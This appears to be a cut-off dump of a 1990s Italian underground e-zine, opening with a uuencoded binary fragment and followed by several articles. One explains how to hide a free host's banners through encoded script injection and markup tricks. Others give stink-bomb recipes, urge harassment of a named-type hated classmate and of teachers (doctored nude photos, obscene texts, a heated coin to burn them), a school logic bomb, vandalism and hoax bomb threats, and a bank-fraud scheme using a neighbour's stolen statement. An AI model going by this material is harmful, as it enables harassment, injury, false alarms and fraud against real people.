M2````!8?````20```'(?````2@```)4?````2P```#4A````3````%,A````
M30```&4C````3@```%0D````3P```'TE````4``>`,$E````40```.<E````
M4@```%4G````4P```*0G````5````.PG````50`C``T`@@(85@``````D@(`
M5P```%L`D@(`6````%\`D@(`60```&,`D@(`6@```&<`D@(`6P```&L`D@(`
M7````&T`D@(`70```'$`D@(`7@```'4`D@(`7P```'<`D@(`8````'D`D@(`
M80```'L`D@(`8@```'T`D@(`8P```'T`D@(`9````'T`D@(`90```'X`D@(`
M9@```'\`D@(`9P```($`D@(`:````(4`D@(`:0```(D`D@(`:@```(T`D@(`
M:P```)(`D@(`;````)0`D@(`;0```!0!D@(`;@```!@!D@(`;P```!P!D@(`
M<````"
`!D@(`<0```+`"D@(`<@```+("D@(`<P```-H"D@(`=````-P"D@(`
M=0```-X"D@(`=@```.`"D@(`=P```%`#D@(`>````.X#D@(`>0```/`#D@(`
M>@````8$D@(`>P````@$D@(`?``=```````%?0`````````%?@````P````%
M?P`````0```%@@`8`/3_```"@P`8`/C_```"A``$``8````$A0`;`/S_```"
MA@`$``8````*AP`<``@````*B``9```````&B0`&```````&B@`*```````&
M@0`!#88``P`!``$``0`!`(``2HI()@0`#0`+`!H`#``X``T`8``/`'L`$`"
*
M`!$`CP`3`)8`#@"J`!4`M0`7`,(`&`#/````````````#0#(`(``!@`!````
M&@"
[``$`@@(-`,@``0`"``$``0`!``$``0`,````````````!````0```@"`
M____?P````4```(```0``(#___]_```&```$```&`````(#___]_"````0``
M"
```````_P````D```(```H``````/__```*```$```,``````#_____#0``
M!``````/```(`````!````H`````#@``!@`````H```!``````P```$``!,`
M`````/\````'```(``````L```@`````*P``"@`````6```$```9`!X``!0`
M``$`%@``!```"
``6```$```"`!8```0``!L`(P`````%!``C``````0*`",`
M````A`0`(P`````$&``C``````0$`",`````!`0`(P`````$`0``BP`$``",
M``H``(T``@``C@`(``"/``0``)``&@``D0`:``"2``H``),`!`#`%`````$`
M#0`:`'L`CP"6`)L`J@"U`,\``````%]?8VQE86YU<`!?7V-H96-K;G5L;`!?
M7W1E<FUI;F%T90!?7W)E<W1O<F5Z97)O`%]A8F]R=`!$1U)/55!``%]?34U/
M1$5,`%]A=&5X:70`7U]D;W-?9V5T9FEL96%T='(`7U]D;W-?<V5T9FEL96%T
M='(`7V5X:70`7U]E>&ET`%]?8V5X:70`7U]C7V5X:70`3E],6$Q32$``3%A,
M4TA``$9?3%A,4TA``$Y?4$%$1$``1E]0041$0`!0041$0`!.7U!354)``$9?
M4%-50D``4%-50D``7U])3T524D]2`%]?1$]315)23U(`7VES871T>0!?7TQ/
M3D=43T$`7U]55$]!`%]L<V5E:P!?7TU+3D%-10!?7U1-4$Y!30!.7U!#35!`
M`%]?<F5A9`!?7W-E='5P:6\`7W1E;&P`7W5N;&EN:P!?7U904DE.5$52`%]?
M<W1P8W!Y`%]?7V9I<G-T`%]?7VQA<W0`7U]?<F]V97(`7V9R964`7V9A<F9R
M964`7VUA;&QO8P!?9F%R;6%L;&]C`%]R96%L;&]C`%]F87)R96%L;&]C`%]?
M8G)K`%]?<V)R:P!?:6]C=&P`7U]214%,0U94`%]S971B;&]C:P!?7V-H;6]D
M`%]C;&]S90!?7V-L;W-E`%]E;V8`7V9C;&]S90!?9F9L=7-H`%]F;'5S:&%L
M;`!?7T]014Y&4`!?7T=%5$90`%]F;W!E;@!?9G!R:6YT9@!?9G-E96L`7V9T
M96QL`%]?9F=E=&,`7U].9F=E=&,`7V9G971C`%]F9V5T8VAA<@!?;65M8W!Y
M`%]O<&5N`%]?;W!E;@!?7V9P=71C`%]F<'5T8P!?9G!U=&-H87(`7U]&4%54
M3@!?7U]R96%D`%]S971V8G5F`%]S=')C870`7W-T<FQE;@!?7U]W<FET90!?
M7W=R:71E`%]?>&9C;&]S90!?7WAF9FQU<V@`7VUA:6X`1$%405-%1T``7U])
M;G0P5F5C=&]R`%]?26YT-%9E8W1O<@!?7TEN=#5696-T;W(`7U]);G0V5F5C
M=&]R`%]?0S!A<F=C`%]?0S!A<F=V`%]?0S!E;G9I<F]N`%]?96YV3&YG`%]?
M96YV<V5G`%]?96YV4VEZ90!?7W!S<`!?7V]S=F5R<VEO;@!?7V]S;6%J;W(`
M7U]V97)S:6]N`%]?;W-M:6YO<@!?97)R;F\`7U]3=&%R=%1I;64`7U]H96%P
M8F%S90!?7V)R:VQV;`!?7VAE87!T;W``7U]A=&5X:71C;G0`7U]A=&5X:71T
M8FP`7U]E>&ET8G5F`%]?97AI=&9O<&5N`%]?97AI=&]P96X`7U]S=')E86US
M`%]?;F9I;&4`7U]O<&5N9F0`7U]F;6]D90!?7VYO=%5M87-K`%]?9&]S97)R
M;F\`7U]D;W-%<G)O<E1O4U8`7U]S=&ML96X`7U]A<F=C`%]?87)G=@!?7U)E
M86Q#=G1696-T;W(`7U]38V%N5&]D5F5C=&]R`%]?<V5T87)G=E]?`%]?8W9T
M9F%K`%]?04A32$E&5`!?7T%(24Y#4@!44D]605-#22Y#`%123U9!4T-)`&QE
M9V=I`&%P<FD`80!P`&X`9FEL90!&24Q%`&9P;W-?=`!S:7IE7W0`;&5V96P`
M9FQA9W,`9F0`:&]L9`!B<VEZ90!B=69F97(`8W5R<`!I<W1E;7``=&]K96X`
`
end
sum -r/size 62952/15795

NOTA DI N0bodY88 = quando si dice buttare giu' un paio di articoletti in 2 ore...
vero Master? mitico Master!!!
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COME ELIMINARE I BANNNER DALLE HP ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Metodo GENERICO per l'eliminazione dei banner dalle pagine web ottenute su i siti free.

Attualmente alcuni server web che offrono spazi gratuiti abbastanza rilevanti o una tutta
una serie di servizi molto interessanti tipo
spree, server101 e fortunecity non si limitano ad applicare alle pagine create dai propri
utenti i soliti banner e popup windows ma eseguono anche periodicamente dei controlli
tramite una procedura automatizzata per verificare se le modifiche da loro inserite
vengono in qualche modo hackerate. Lo scrivono loro stessi questo e direttametne assieme
ai loro script come commento.. e vi assicuro che non scherzano.
Alla prima infrazione in questo senso il sito e' eliminato senza troppi complimenti.
Vengono eseguiti controlli specifici sulla presenza di comandi </NOSCRIPT> e in qualche
caso (vedi spree e fortunecity) controllano anche la sintassi dei comandi dei vostri
script per vedere se c'e' qualcosa che interferisce a livello di gerarchia degli oggetti
che portrebbe inibire la visualizzazione dei loro banner.
Nella maggior parte dei casi e' sufficiente inserire </NOSCRIPT> in maniera codificata
(usando document.write(unasci(comandi codificati in ascii)))a seguito delle istruzioni
di chiusura </HTML></HEAD></BODY></STYLE> ecc..
Ma non sempre e' utile ..
cmq come avevo gia detto </NOSCRIPT> codificato ascii viene %3C%4E%4F%53%43%52%49%50%54%3E
percui la procedura da inserire a fine codice html o di seguito ad un terminatore </qualcosa>
e' a="%3C%4E%4F%53%43%52%49%50%54%3E" ; function b(){c=unescape(a);document.write(c);}b()
Invece un metodo generico per la cancellazione lasciando inalterato il codice prodotto dal server
e addirittura mantenendo sulla pagina i banner (che pero' diventano invisibili) e' quello
di usare delle fasce di copertura con caratteri molto grandi.
Il testo css unito al dhtml fornisce a questi caratteri una priorita' di visualizzazione
piu' alta rispetto alla grafica percui sono in grando di coprire ogni cosa.
(Anche le barre di scorrimento volendo!)
E' possibile regolando in maniera appripriata la dimensione di un carattere <punto> o di
un carattere "-" o altro coprire qualunque cosa di qualcunque dimensione in qualunque posizione
si trovi all'interno della nostra pagina lasciando visibile tutto il resto.
E' una specie di "toppa" che se viene colorata con lo stesso colore dello sfondo funziona
egregiamente da cancellino.
Un esempio. Allegata c'e' una pagina html com un banner (il gatto felix che va su e giu'
preoccupato di diventare invisibile! ;-) ), e le poche righe di codice necessarie alla
sua cancellazione.
L'help all'interno della pagina htm sara di ulteriore aiuto.
Sono valide le seguenti considerazioni:
1. La priorita' del testo rispetto al banner rimane invariata nel tempo percui anche se il
codice extra medifica il banner, ad esempio cambiando pubblicita' ogni tot secondi, questo
rimane comunque invisibile e senza sfarfallamenti: tutto avviene in background.
2. Il banner e' sempre presente, il server non puo' verificare la visibilita' di quest'ultimo
ma controllandone la presenza 'fisica' tramite l'analisi della pagina quest'ultima risulta
percui non ci sono problemi di -perdita free account-.
Per vedere un esempio 'reale' di questo sistema controllare la pagina che ho aperto su spree:
http://members.spree.com/education/csf0137.
In questa ho eliminato il banner iniziale sormontandogli sopra una tripla serie di "I" molto grandi.
Il banner finale (si poteva cancellare anche questo col sistema sopra) l'ho semplicemente
spostato a destra di qualche metro rispetto al desktop [ ;-) ] aprendo un TABLE come
ultima riga ..SENZA RICHIUDERLO con </TABLE> pero'..

...
<!-- ultima riga della pagina web da mettere su spree -->
<TABLE BORDER=0 cellpadding=0 cellspacing=0 width=1000000>

tutto cio' che verra' inserito a seguito di questa riga (sempre dal server) sara' un tag
facente parte del table stesso.. e sara' centrato (con width=1000000) a 500.000 pixel a
destra del browser, quindi abbastanza lontano da non essere visto.

Master - Parsifal

Supporti acclusi:

Pagina di prova html : s.htm
banner di prova : f.gif

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°°°Û°°°°°°°°°ÛÛÛ°°°ÛÛ°°°°°°Û°°°°°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛ°°ÛÛ°°°ÛÛ°°ÛÛ°°°ÛÛ°°°°²
²°°°°°°°°ÛÛÛ°°°°°°°°ÛÛÛÛ°°ÛÛ°°°°°ÛÛÛ°°°°°ÛÛ²²²²Û°°ÛÛ°°°°°°ÛÛ°°°ÛÛ°°°ÛÛ°ÛÛ°°°°°²
²°°ÛÛÛÛÛÛÛ²ÛÛÛÛÛÛÛ°°ÛÛ°ÛÛ°ÛÛ°°°°ÛÛ²ÛÛ°°°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°°°ÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°°°°²
²°°°°°°ÛÛÛÛÛÛÛ°°°°°°ÛÛ°°ÛÛÛÛ°°°ÛÛÛÛÛÛÛ°°°ÛÛ°ÛÛ°°°°ÛÛ°°°°°°ÛÛ°°°ÛÛ°°°°°Û°°°°°°°²
²°°°°°ÛÛ°°°°°ÛÛ°°°°°ÛÛ°°°ÛÛÛ°°ÛÛÛ°°°ÛÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛ°°ÛÛ°°°ÛÛ°°°°°Û°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ STINKY BOMB ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

N.B. QUESTO FILE E' DA RITENERSI A TITOLO PURAMENTE INFORMATIVO, PERCIO'
L'AUTORE, AVA666, DECLINA OGNI RESPONSABILITA' DALL'USO CHE POTREBBE
ESSERNE FATTO. L'AUTORE, DUNQUE, NON INCORAGGIA CHI VOLESSE SERVIRSENE
PER SCOPI ILLEGALI. <- DiScLaImErS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
IL POSSESSO DI QUESTO FILE E' COMUNQUE DEL TUTTO LECITO. <- PrEcIsAzIoNe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_____________
| STINKY BOMB | ("Special Edition" for NewBies) by AVA666
~~~~~~~~~~~~~

Esistono altre bombe che non uccidono, che hanno pero' il loro bell'effetto,
che sono anche facili da preparare. Una di queste e' la "Stinky Bomb", ovvero
"Bomba puzzolente". Sinceramente ne esistono infiniti utilizzi...
Comunque, esistono 2 principali ricette:
#1 ammoniaca + zolfo = solfuro d'ammonio
#2 solfuro di ferro + acido
Entrambe fanno l'effetto 'uova marce' (soprattutto il #2) che prende alla gola
e ti nausea all'estremo... come mi eccita... Vediamo come fare il primo tipo:

/~~~~~~~~~~~~~~~~~~~\
< DI COSA HAI BISOGNO >
\___________________/

- Un barattolo di vetro (e' piu' resistente - non vuoi che ti si rompa
quando lo stai trasportando, vero?)
- Dell'amoniaca
- zolfo (si trova in erboristeria, in un consorzio agrario, ecc)

Metti dell'ammoniaca nel barattolo di vetro e aggiungi dello zolfo. CHIUDI
SUBITO! Bene, adesso agita il tutto... Vorrei essere molto lontano (e col
vento a sfavore) quando qualcuno lo aprira...

N.B. bastano piccole dosi per produrre quel bel 'profumino' - Eh eh eh

<EVENTUALI UTILIZZI>
Le Stinky Bomb possono essere utilizzate come una sorta di 'scherzo' per chi
avra' la sfortuna di aprirle, oppure tirandole da qualche parte.
<in realta', come ho gio' detto le possibilita' sono tantissime, per esempio:>
Un'idea molto Simpatica e' quella di "cospargere" il tappo ed il contenitore
con della colla o del vischio, cos chi la apre dovra' lottare un pochino per
richiudere il barattolo e sara' costretto a fare dei bei respiri...

<oppure:>
Potresti sostituire il contenuto di una boccetta di profumo con il composto
della Stinky Bomb...

<o ancora:>
A scuola... Oh, esiste la scuola! (gia' purtroppo esiste...) Per fortuna che
ci sei tu che 'movimenti' l'ambiente! - Luoghi in cui utilizzare la St. Bomb:

- Bagno
- Andito
- Presidenza
- Segreteria
- Classe (se vuoi un modo sicuro per non fare lezione!)
- Palestra

<e poi...>

Usa l'immaginazione!!!

P.S. La prima volta che ho respirato questa cosa e' stato BESTIALE! Mi ha
"rincogXionito" subito! Per un attimo ho toccato il cielo (sembrava mi
fossi sparato qualcosa) poi mi ha preso di colpo una nausea assurda!

Questo testo fa parte del magico

|\/|
| | Y
|~~>
|~~ E R S O N A L
/~~
\__ O O K B O O K

del noto Anarchist Phreaker...

/~\ \ / /~\
/___\ \ / /___\
/ \ \_/ / \
=====> 6 6 6 <=====

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ :::::::::::::::::::::::::: |
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Titolo: Divertirsi a scuola ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ di : ElectroRipper ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Scritto il : xx/2/99 ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Pericolo: ÛÛÛ°°°°°°° ³
ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ;


ElectroRipper - Divertirsi a scuola.
------------------------------------

Mi scuso con Hell's Angel per aver copiato il suo stile di presentazione
dell'articolo, ma ultimamente va molto di moda copiare quello di pIGpEN,
io invece amo i classici :)

Si si ! avete letto bene ! divertirsi a scuola si puo', se si ha fantasia
e fegato. Anzi, se leggete questo articolo la fantasia non vi
servira' nemmeno, cosi' l'unica cosa che serve e' un fegato (tanto con
la nuova legge.... ;)

Dunque, cominciamo con qualche scherzetto simpatico...
C'e' sempre qualcuno che vi sta proprio, ma prooooprio sul cazzzzo!!!
In classe mia questo qualcuno e' una ragazza che chiamero' Carlotta per
non sporcare questo file con il suo vero nome, che io odio profondamente,
spesso in classe mi viene voglia di prenderla a calci nei denti e spaccarle
successivamente il cranio con una sbarra di ferro (non sto esagerando, voi
non la conoscete). Questa mocciosa, infatti, e' odiosa, presuntuosa, bastarda,
stupida, lecchina, brutta, secchiona (nel senso che studia 12 ore al giorno,
ma poi ha i miei stessi voti, se non peggio), maleducata, antipatica, ignorante,
senza alcuna virtu', sicura di avere sempre ragione, insomma, riesce a tirare
fuori il lato peggiore di noi che dobbiamo per forza sopportarla 5 ore
al giorno.... Uhm, dato che la prima idea (quella di prenderla a calci e
sfondarle il cranio) non e' attuabile, faro' qualche scherzetto (eheheh) !
E' il bersaglio perfetto ! Anche voi, scegliete come vittima un essere che
odiate con tutto il cuore (non avrete rimorsi e vi divertirete molto di piu' :)
Insomma, ritornando a Carlotta, bisogna stare molto attenti, perche' appena
scopre anche lo scherzo piu' innocente, come minimo ci denuncia ai carabinieri,
dato che la sua ignoranza non le permette di confrontarsi direttamente con
noi. Inoltre sa di essere odiata da tutti, quindi e' molto sospettosa...

-Ma non disperiamo! Questo progetto che vi spieghero', infatti, non presenta
nessun rischio (o quasi), e anche voi potrete ridere alle spalle della
vostra 'Carlotta'

Ecco cosa serve :

- Guscio giallo della sorpresa dell'ovetto kinder
- Alcool
- Profumi vari

In pratica si tratta di fare una bomba puzzolente mischiando 1/2 di profumi
vari precedentemente mischiati tra loro, e 1/2 di alcool.
SENZA ODORARE (se e' uscita bene e l'annusate non sarete mai piu' gli stessi :)
versatela nel guscio giallo che avete preso dall'ovetto kinder, e recatevi
a scuola. Quando state per uscire svitate il guscio, ma non apritelo completamente,
in modo da farlo trovare in una situazione nella quale basterebbe un piccolissimo
urto per farlo aprire... Stando attenti a non farlo aprire prima del dovuto,
cercate di metterlo dentro la cartella della vittima (e' piu' facile di quanto
si possa immaginare), cercando, se possibile, di farlo finire in basso, sotto
ai libri. Appena si muovera' e qualche libro urtera' il guscio, se l'avete
messo bene, si aprira' facendo fuoriuscire il puzzolentissimo contenuto :))))

-Una variante e' versare il liquido direttamente nella cartella, e' piu'
divertente ed efficace, e inoltre potrebbe non capire mai cosa sia successo
in realta', ma come capirete, e' anche piu' rischioso (ad ogni modo non fatelo
durante la lezione, ma poco prima di uscire, o nei corridoi)

-Un'altra cosa divertente e' buttare una crostatina mulino bianco o meglio
un po' di marmellata (questo e' bello) nella cartella
della vittima, durante la ricreazione, mentre non guarda. Mettetegliela
sotto i libri o tra le pagine di un libro, dopo un po' trovera' una bella
sorpresa :))))))))))

-Se invece e' un professore a starvi sul cazzo, allora e' ancora piu' semplice.
Basta avere uno scanner e procurarsi una foto del professore.
Con lo scanner e un programma di fotoritocco non ci vuole niente a fare
un fotomontaggio. Ad esempio potete mettere la faccia del professore su un
corpo preso da uno di quei giornaletti per gay con gli uomini nudi sopra,
(ci sara' un gay nella vostra scuola : fateveli prestare da lui :) !!! Se
invece si tratta di una professoressa e' ancora meglio, perche' per fare
il fotomontaggio comprerete un giornalino di foto di DONNE nude, unendo cosi'
l'utile al dilettevole :-D
Una volta fatto il fotomontaggio fatene varie fotocopie (anche in bianco e
nero, purche' si veda bene la faccia del professore) e disseminatele
per i dintorni della scuola.

-Mettete colla in tutte le serrature della scuola (compresa quella esterna,
non si sa mai che riuscite a fare festa :)

-Se la scuola ha un collegamento a internet cercate di procurarvi l'indirizzo
di e-mail, poi non c'e' neanche bisogno che vi dica io cosa fare (le possibilita'
che si aprono dinanzi a voi sono infinite....)

-Utilizzando uno di quei servizi su internet per mandare small messages gratuiti
e anonimi, mandate ogni giorno messaggi osceni sui telefonini alle vostre
professoresse (potete divertirvi soprattutto con le zitellone racchie)

-Mettete del sodio puro o del potassio puro in una capsula, buttatela nel
gabinetto e tirate lo scarico. In un file di non mi ricordo chi, poi
inserito nel cookbook di Jolly Roger, l'autore garantisce che puzzera'
l'intera scuola. Non ho provato con il sodio puro perche' non l'ho trovato,
quindi non posso garantirvi niente, ma vi dico subito di non provare con
il potassio clorato o altra robba del genere, perche' l'ho fatto e non
funziona...

-Fate un fumogeno e accendetelo all'ingresso della scuola.

-Stupida programmazione in Pascal e stupidi professori.... Non ci vuole
niente a fare una bomba logica in Pascal. Quindi, se riuscite a finire
subito il programma che dovevate fare, fate un programmino TSR e disponete
in modo che venga chiamato all'avvio del sistema. Piu' tempo deve passare
prima dell'"esplosione" piu' andrete sicuri. Se ad esempio andate nel
laboratorio di informatica il martedi', allora fate in modo che esploda
sabato (lunedi' sarebbe troppo sospetto). Se avete accesso ai programmi delle
altre classi modificateli in modo da farli diventare offensivi per il professore.

-Se siete arrivati in classe per primi avete l'occasione di giocare un simpatico
scherzetto. Mettete una cento lire su una batteria da 9V in modo che tocchi
entrambi i poli. Dopo 4-5 minuti con una matita fatela volare in una zona
della classe dove dovrebbe essere vista dal coglione che sta arrivando.
Una volta che la raccoglie potrete sentire le sue urla di dolore... (BURLONI!)
Ecco in pratica quello che dovrebbe succedere : la cento lire viene caricata
dalla batteria, che invece si scarica, diventando molto calda, e facendo
diventare calda anche la 100 lire. Fatevi bene i vostri calcoli, perche'
se la 100 lire si raffredda prima che la vittima la raccoglie, allora niente
scherzo e niente urla di dolore.

-Ecco una variante dello scherzo della 100 lire. Attaccate un filo elettrico
a un polo della batteria e andate a scuola. Mentre non vi vede nessuno attaccate
l'altro capo del filo all'altro polo e gettate !SUBITO! la batteria nel
corridoio. Quando il bidello o (ma non oso sperare tanto) IL PRESIDE, la
raccogliera', incazzato per il fatto che gli studenti non sappiano usare
i cestini, potrete ridere, e ridere. Infatti a riscaldare la
batteria e' il veloce flusso di elettroni tra i due poli, in questo
caso permesso dal filo elettrico attaccato alla batteria (adesso sapete
perche' in alcuni manuali di elettronica consigliano di non collegare
mai i due poli di una batteria direttamente :)

-Comprate molte uova. Fate un piccolo buco su ogni uovo, e lasciate tutto
in un posto molto caldo per 3-4 settimane.
Avrete cosi' una bella riserva di bombe puzzolenti. Prendetene un po', e
insieme agli amici divertitevi a dare un nuovo look alla scuola, e soprattutto
un nuovo odore :) (Meglio farlo di pomeriggio o di sera se la vostra scuola
rimane aperta. Nella mia, ad esempio, si puo' passare dalla palestra.)

-Come non parlare del classico falso-allarme bomba ??? Avviatevi da casa,
fate la telefonata ai carabinieri da una cabina pubblica senza farvi
notare da nessuno e !VELOCEMENTE! andate a scuola ! Se riuscirete ad arrivare
subito a scuola avrete un buon alibi, dato che nessuno ricordera' il minuto
e il secondo preciso nel quale siete arrivati, ma tutti potranno confermare
che quando sono arrivati i carabinieri voi eravate gia' li' da un bel po'.

-Ancora meglio (se non vi spaventa troppo) sarebbe nascondere il giorno
prima della telefonata, nella scuola, qualcosa di non troppo pesante, come
una molotov, o magari una bomba non funzionante (cioe' nel senso che lo farete
apposta a farla difettosa, ma loro non devono saperlo). In tal modo c'e'
la possibilita' che sospendano le lezioni per qualche giorno per indagare.

||| Ecco altre piccole cose che mi sono divertito a fare ......

- Ho preso il diario di un mio amico e nell'ora di educazione fisica (non la
facciamo mai e non ricordo neanche che faccia abbia la prof) glielo abbiamo
bruciato.

- Una volta un mio amico e' andato in bagno durante il compito di tedesco.
In pratica lo aveva gia' finito e lo avrebbe solo dovuto consegnare, ma lo
ha lasciato sul banco, cosi' io gli ho cambiato tutte le parole aggiungendo
lettere a capa di cazzo alla fine di ognuna. (questo l'ho fatto in seconda
media, e con il professore che stava a due passi da me, quindi vuol dire
che il rischio e' proprio poco).

- Spesso mi diverto a cambiare i numeri degli esercizi per casa, sui diari
dei secchioni della mia classe, stando attento a non far notare la differenza
di calligrafia. E' alquanto spassoso vedere gente che studia fino alle 2
di notte arrivare a scuola e dover copiare i compiti dopo aver saputo
che quelli che hanno fatto non erano quelli assegnati dal prof.

- Con un mio amico ho scambiato tutti i tasti della tastiera di un computer
della scuola, e a rompere quelli che non potevamo scambiare.
Nella gioia del momento (e' sempre bello fare un danno alla scuola) non
abbiamo tenuto conto che in tutto eravamo una decina di persone a usare
quel computer, e non e' stato difficile capire chi era stato.
Il professore si e' mooooooooooolto arrabbiato.

- Ottenuto l'op su un canale di finocchi ho settato come topic :

XXXXX XXXXXXX : Superdotato ma dolcissimo, chiamalo allo xxxx/xxxxxx

(XXXecc. era il nome del mio professore piu' bastardo, e xxxx/xecc. il suo
numero di telefono)

||| Ecco altre cose che altri miei amici si sono divertiti a fare .....

- Uno di classe mia, in prima, stufo dei soliti programmi in pascal del tipo
inserisci l'area del triangolo, inserisci il cateto......ha fatto un programma
alquanto offensivo che chiedeva di inserire "la formula di tua sorella", dopodiche'
basandosi su un complicato "algoritmo" di sua creazione, ti diceva se tua
sorella poteva essere sodomizzata o no. Successivamente il programma chiedeva
se dovesse calcolare un'altra parente...
Costui non aveva tenuto conto del fatto che il professore dal suo computer
poteva controllarci tutti...Sgamato, con conseguente "discussione" con i
genitori.....

- Il mio prof fa pagare dalle 1000 alle 3000 lire a chi trova con una gomma
da masticare in bocca. Un giorno tutti i miei amici hanno deciso di
farsi trovare tutti con la gomma. Purtroppo cio' non ha avuto l'effetto
sperato, e il professore ha voluto i soldi da tutti.

Ecco. Mi sembra di avervi dato un bel po' di idee, no ?
A scuola non dovreste piu' annoiarvi per i prossimi 2 o 3 mesi ;)


ElectroRipper

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚ{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}¿º
º³ COME FOTTERE I SOLDI AL VS VICINO IN MODO DEL TUTTO LEGALE ³º
ºÀ{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}Ùº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

------------------------------------------------------------------------------
Io non mi assumo nessuna responsabilita' per l'uso improprio delle informa
zioni contenute in questo testo, divulgato a solo scopo informativo per
evitare che altre persone usino questo metodo x creare dei danni a voi.
------------------------------------------------------------------------------

Avete letto bene e questo potrebbe essere possibile se si verificassero le
seguenti condizioni:

- avete in banca un po' di soldi (bastano anke 500.000);
- riuscite a fottere un resoconto mensile spedito dalla banca al vs vicino;
- conoscete un telefono pubblico, o una cabina dove non si sente che si sta
chiamando da li' (quindi senza il rumore del traffico);

Allora prima di tutto premetto che non ho mai provato questo metodo ma ho
pensato a cio' che sto x proporvi a causa di uan discussione di due ultra
sessantenni che stavano parlando oggi sull'autobus.
Uno dei due stava dicendo all'altro di passare alla banca dove aveva i soldi
lui, la XXX (non metto il nome non x privacy ma xche' non so che banca :P) e
tra i vari vantaggi che gli stava elencando sentii che diceva la mitica frase
"in questa banca ti offrono la possibilita' di comprare bot e vari titoli
tramite il telefono, tu basta che chiami il numditel della XXX ti identifichi
come Pinco Pallino, dici il tuo codice che viene riportato sul resoconto
mensile inviatoti dalla banca..."
e qui mi scappo' la brillante idea :))))
Mi direte poi in mail se pensate sia brillante o se credete sia na m...
Allora una volta che voi riuscite a rubare l'estratto conto (o resoconto
mesile) mandato dalla banca al vs vicino [ o a chiunque se ci riuscite e se
tornate a casa prima di lui :) ] avete il suo numerino magico con il quale
potete identificarvi e fare acquisti x lui (ma non fategli guadagnare se no
dopo vi mangiate i coglioni...) ma a che pro direte voi?
La risposta puo' essere scontata ma pensate un attimo a voi che comprate...
diciamo 250 titoli a 20.000 lire (5.000.000) della SexyShop & C. ... e
